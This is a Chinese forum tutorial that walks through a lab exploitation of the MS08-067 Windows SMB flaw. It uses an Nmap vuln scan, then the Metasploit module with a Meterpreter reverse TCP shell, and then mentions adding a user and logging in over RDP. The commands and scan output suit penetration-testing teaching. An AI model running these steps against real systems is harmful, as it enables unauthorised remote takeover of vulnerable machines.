来源：http://bbs.ichunqiu.com/thread-10369-1-1.html?from=ch

社区：I春秋

作者：X_Al3r

00x01

#[玩转Metasplot第一节]

Ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷，攻击可以获得一个相对高的权限

But，许多书上已经说过了，为此我也不多介绍了

推荐书籍：Metasploit魔鬼训练营等，虽老但入门非常有用

00x02

在使用Metasploit之前我们需要连接上postgresql数据库

具体操作看帖子：[AnaLyz3r]Linux kali的魅力--Nmap与Metasploit中的Metasploit部分

攻击者ip:192.168.1.124

被攻击ip:192.168.1.125

使用工具：Nmap,msfconsole,

利用的攻击载荷：Ms08_067_netapi

利用的payload：windows/meterpreter/reverse_tcp

00x03

#开始使用

1：打开metasploit中的msfconsole框架

命令：

msfconsole

复制代码

当然，打开metasploit之前需要连接上postgresql

命令:

service postgresql statr

复制代码

2：寻找与加载Ms08_067模块

如果你无法记住ms08_067_netapi的路径的话可以使用search这个搜索命令

命令：

search ms08_067_netapi

复制代码

搜索ms08_067_netapi路径

可以看见，已经搜索出ms08_067_netapi的路径

我们使用use 来加载这个模块

加载成功

3：设置模块中的参数与加载一枚payload

首先我们可以使用show options 来查看所需要设置的参数

先添加RHOST中的参数

命令：

set RHOST 被攻击者ip

复制代码

我们在来加载一枚payload

命令：

set payload windows/meterpreter/reverse_tcp

复制代码

加载成功，我们先使用show options命令来查看需要设置的参数

命令:

set LHOST 攻击者ip

复制代码

OK，设置完成后我们使用命令开始攻击

命令：

exploit

复制代码

成功攻击会反弹一个meterpreter就表示攻击成功，我们输入命令

shell

复制代码

就可以调用系统的cmd了，例如进行一个提权等看演示

可以看见，这是当前用户

创建并添加成功- -# 因为我已经打开了3389，直接mstsc /admin登录

00x04

##Nmap辅助

可能你们很好奇，为什么没有出现nmap，他的纯在有什么意义。

首先，在利用ms08_067_netapi之前我们是不知道他存在这个漏洞的我们需要使用nmap扫出来

在msf下使用命令：

nmap --script=vuln 192.168.1.125

复制代码

得出结果

Starting Nmap 7.01 ( [url]https://nmap.org[/url] ) at 2016-08-19 00:14 CST

Nmap scan report for 192.168.1.125

Host is up (0.0010s latency).

Not shown: 994 closed ports

PORT     STATE SERVICE

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

3389/tcp open  ms-wbt-server

5000/tcp open  upnp

MAC Address: 00:0C:29:8E:0F:E9 (VMware)

Host script results:

| smb-vuln-cve2009-3103:

|   VULNERABLE:

|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)

|     State: VULNERABLE

|     IDs:  CVE:CVE-2009-3103

|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,

|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a

|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE

|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,

|           aka "SMBv2 Negotiation Vulnerability."

|

|     Disclosure date: 2009-09-08

|     References:

|       [url]http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103[/url]

|_      [url]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103[/url]

| smb-vuln-ms08-067:

|   VULNERABLE:

|   Microsoft Windows system vulnerable to remote code execution (MS08-067)

|     State: VULNERABLE

|     IDs:  CVE:CVE-2008-4250

|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,

|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary

|           code via a crafted RPC request that triggers the overflow during path canonicalization.

|

|     Disclosure date: 2008-10-23

|     References:

|       [url]https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250[/url]

|_      [url]https://technet.microsoft.com/en-us/library/security/ms08-067.aspx[/url]

|_smb-vuln-ms10-054: false

|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 16.14 seconds

复制代码

可以看见nmap已经扫出来了，为什么nmap会扫这些漏洞呢？？

因为命令中vuln负责检查目标机是否有常见的漏洞（Vulnerability），如是否有MS08_067

所以他可以扫出漏洞，然后在使用metasploit寻找指定的exploit

总结#

1：可以先使用nmap进行一个简单的漏洞扫描，如果存在系统漏洞等可以在使用msf中的模块进行溢出

2：耐心，耐心，耐心